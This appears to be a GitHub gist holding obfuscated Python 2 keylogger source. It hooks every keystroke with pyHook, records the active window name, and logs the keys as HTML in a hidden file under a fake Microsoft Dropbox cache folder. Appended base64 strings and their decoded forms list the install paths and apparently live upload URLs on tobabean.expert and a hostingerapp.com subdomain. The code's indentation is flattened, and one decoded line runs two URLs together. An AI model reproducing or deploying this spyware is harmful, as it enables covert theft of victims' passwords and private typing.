o0OO00=os.getenv('LOCALAPPDATA')
oo=(o0OO00+"\\Microsoft\\Dropbox\\avatar_cache\\")
if 27-27:oO0OooOoO*o0Oo
except:
pass
if 5-5:OoO0O00
IIiIiII11i={8:'(bksp)',9:'(tab)',13:'(Enter)',19:'(Paus)',20:'(BMayus)',27:'(ESC)',32:'(Barr-espa)',33:'(pag-up)',34:'(pag-dn)',35:'(END)',36:'(home)',37:'(Fle-Iz)',38:'(Fle-Arr)',39:'(Fle-Der)',40:'(Fle-Aba)',44:'(Prt-Scr)',45:'(INSET)',46:'(Desjr)',48:'0',49:'1',50:'2',51:'3',52:'4',53:'5',54:'6',55:'7',56:'8',57:'9',64:'@',65:'a',66:'b',67:'c',68:'d',69:'e',70:'f',71:'g',72:'h',73:'i',74:'j',75:'k',76:'l',77:'m',78:'n',79:'o',80:'p',81:'q',82:'r',83:'s',84:'t',85:'u',86:'v',87:'w',88:'x',89:'y',90:'z',91:'(Win-Izq)',92:'(Win-Dcha)',93:'(App)',96:'(#0)',97:'(#1)',98:'(#2)',99:'(#3)',100:'(#4)',101:'(#5)',102:'(#6)',103:'(#7)',104:'(#8)',105:'(#9)',106:'#(*)',107:'#(+)',109:'#(-)',110:'#(.)',111:'#(/)',112:'(F1)',113:'(F2)',114:'(F3)',115:'(F4)',116:'(F5)',117:'(F6)',118:'(F7)',119:'(F8)',120:'(F9)',121:'(F10)',122:'(F11)',123:'(F12)',144:'(Bloq#)',145:'(scrolllock)',160:'(Shitf-Izq)',161:'(Shitf-Der)',162:'(CTRL-Izq)',163:'(CTRL-Der)',164:'(ALT-Izq)',165:'(ALT-Dcha)',186:';',187:'=',188:',',189:'-',190:'.',191:'/',192:'~',219:'[',220:'\\',221:']',222:"'"}
if 51-51:oOo0O0Ooo*I1ii11iIi11i
if 48-48:oO0o/OOooOOo/I11i/Ii1I
class IiiIII111iI():
try:
f=open(oo+"vpr.html","a")
except Exception,e:
try:
f=open(oo+"vpr.html","w")
except Exception,e:
pass
try:
f.write('</font></b><br><b><font color="#00F">--------------</font></b><br>')
except:
pass
try:
f.write('</font></b><br><b><font color="#00F"> Date: '+time.asctime()+"</font></b><br>")
except:
pass
try:
f.close()
except:
pass
if 34-34:iii1I1I/O00oOoOoO0o0O.O0oo0OO0+Oo0ooO0oo0oO.I1i1iI1i-II
def onApp(self,appname):
if 100-100:i1IIi.I1i1iI1i/Oo0ooO0oo0oO*OoooooooOO+iii1I1I*I11i
try:
try:
self.f=open(oo+'vpr.html',"a")
if 99-99:O0oo0OO0.Ii1I/iIii1I11I1II1*iIii1I11I1II1
except Exception,II1iI:
self.f=open(oo+'vpr.html',"w")
if appname!=self.app:
if 27-27:O0oo0OO0*oOo0O0Ooo.oO0OooOoO
try:
self.app=appname
self.f.write('</font</b><br><b><font color="#00F">-----------------</font></b><br>')
except:
pass
try:
self.f.write('</font></b><br><font color="#00F">Date: '+time.asctime()+'</font><br><b>Winw:'+self.app+'</b>:<br><font color="#FF0000"><b>')
except:
pass
if 1-1:oO0OooOoO-OOooOOo%i11iIiiIii+Oo0ooO0oo0oO.I1i1iI1i
try:
sys.stdout.write('</font><br><br><b><font color="#00F">Date: '+time.asctime()+'</font></b><br><b>Winw: '+self.app+':</b><br><b><font color="#FF0000"><b>')
except:
pass
if 55-55:iIii1I11I1II1-o0Oo.O00oOoOoO0o0O*Oo0ooO0oo0oO*i1IIi/iIii1I11I1II1
try:
self.f.close()
except:
pass
except:
pass
if 79-79:I11i+I1i1iI1i.II*Oo0ooO0oo0oO%iii1I1I.o0Oo
def onKeyboardEvent(self,event):
try:
O0o0o00o0Oo0=event.KeyID
ii11=event.Ascii
if 28-28:II+I1i1iI1i-II.OoooooooOO
try:
self.onApp(event.WindowName)
except:
pass
try:
self.f=open(oo+'vpr.html',"a")
except Exception,II1iI:
self.f=open(oo+'vpr.html',"w")
if((O0o0o00o0Oo0 in range(48,91))or(O0o0o00o0Oo0 in range(96,112))or(O0o0o00o0Oo0 in range(186,223))or(O0o0o00o0Oo0==32)):
try:
sys.stdout.write(chr(ii11))
except:
pass
if 97-97:oOo0O0Ooo.iii1I1I
try:
self.f.write(chr(ii11))
except:
pass
if 32-32:OoO0O00-oO0OooOoO-i11iIiiIii%I1i1iI1i
if O0o0o00o0Oo0==8:
sys.stdout.write('\b\x00\x00\b')
if 54-54:Ii1I%O0+o0Oo-O0oo0OO0/iii1I1I
self.f.write('</font></b><font color="#000">[DEL]</font><b><font color="#FF0000">')
if 31-31:oOo0O0Ooo+oO0OooOoO
if O0o0o00o0Oo0==9:
sys.stdout.write('\t')
self.f.write('</font></b><br><font color="#FF0000">\t<b>')
if 13-13:Ii1I*I11i*o0Oo
if O0o0o00o0Oo0==13:
sys.stdout.write('\t|')
self.f.write('</font></b><br><font color="#FF0000">\t|<b>')
if 55-55:oO0OooOoO
elif((O0o0o00o0Oo0 not in range(48,91))and(O0o0o00o0Oo0 not in range(96,112))and(O0o0o00o0Oo0 not in range(160,162))and(O0o0o00o0Oo0 not in range(186,223))and(O0o0o00o0Oo0!=32)and(O0o0o00o0Oo0!=8)and(O0o0o00o0Oo0!=9)and(O0o0o00o0Oo0!=13)):
try:
if 43-43:I1ii11iIi11i-i1IIi+I1i1iI1i+O00oOoOoO0o0O
sys.stdout.write("[%s]"%(IIiIiII11i[O0o0o00o0Oo0]))
if 17-17:oO0o
self.f.write('</b></font></b><font color="#000">'+"[%s]"%(IIiIiII11i[O0o0o00o0Oo0])+'</font><b><font color="#FF0000">')
if 64-64:O00oOoOoO0o0O%i1IIi%OoooooooOO
except Exception,II1iI:
sys.stdout.write("[%d]"%(O0o0o00o0Oo0))
self.f.write("[%d]"%(O0o0o00o0Oo0))
if 3-3:O0oo0OO0+O0
self.f.close()
if 42-42:Ii1I/i1IIi+i11iIiiIii-O00oOoOoO0o0O
return True
except:
if 78-78:oOo0O0Ooo
pass
if 18-18:O0-O0oo0OO0/O0oo0OO0+II%II-Oo0ooO0oo0oO
def __init__(self):
try:
self.app=''
except:
pass
if 62-62:O0oo0OO0-Oo0ooO0oo0oO-I1ii11iIi11i%i1IIi/I11i
if 77-77:oO0OooOoO-oO0OooOoO.o0Oo/oO0o
if __name__=='__main__':
i1iIIIiI1I=IiiIII111iI()
OOoO000O0OO=pyHook.HookManager()
OOoO000O0OO.KeyDown=i1iIIIiI1I.onKeyboardEvent
OOoO000O0OO.HookKeyboard()
pythoncom.PumpMessages()
##############################
## ab91f76394ddf866cc0b315d862a19b57ded93be5dfc2dd0a81e6a43d0c5f301
QzpcXFB5dGhvbjIuNw0K
XFxNaWNyb3NvZnRcXERyb3Bib3gNCg==
QzpcXFB5dGhvbjIuN1xcDQo=
QzpcXFB5dGhvbjIuN1xcRExMc1xcDQo=
XFxNaWNyb3NvZnRcXERyb3Bib3hcXA0K
J0xPQ0FMQVBQREFUQScNCg==
aHR0cDovL3RvYmFiZWFuLmV4cGVydC9maWxlLnBocA0K
aHR0cDovL3U5Mjk0ODkzNTUuaG9zdGluZ2VyYXBwLmNvbS9maWxlLnBocA0K
aHR0cDovL3RvYmFiZWFuLmV4cGVydC8NCg==
aHR0cDovL3U5Mjk0ODkzNTUuaG9zdGluZ2VyYXBwLmNvbS8=
aHR0cDovL3RvYmFiZWFuLmV4cGVydC9waGlsZS5waHANCg==
aHR0cDovL3U5Mjk0ODkzNTUuaG9zdGluZ2VyYXBwLmNvbS9waGlsZS5waHA=
C:\\Python2.7
\\Microsoft\\Dropbox
C:\\Python2.7\\
C:\\Python2.7\\DLLs\\
\\Microsoft\\Dropbox\\
'LOCALAPPDATA'
http://tobabean.expert/file.php
http://u929489355.hostingerapp.com/file.php
http://tobabean.expert/
http://u929489355.hostingerapp.com/http://tobabean.expert/phile.php
http://u929489355.hostingerapp.com/phile.php
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment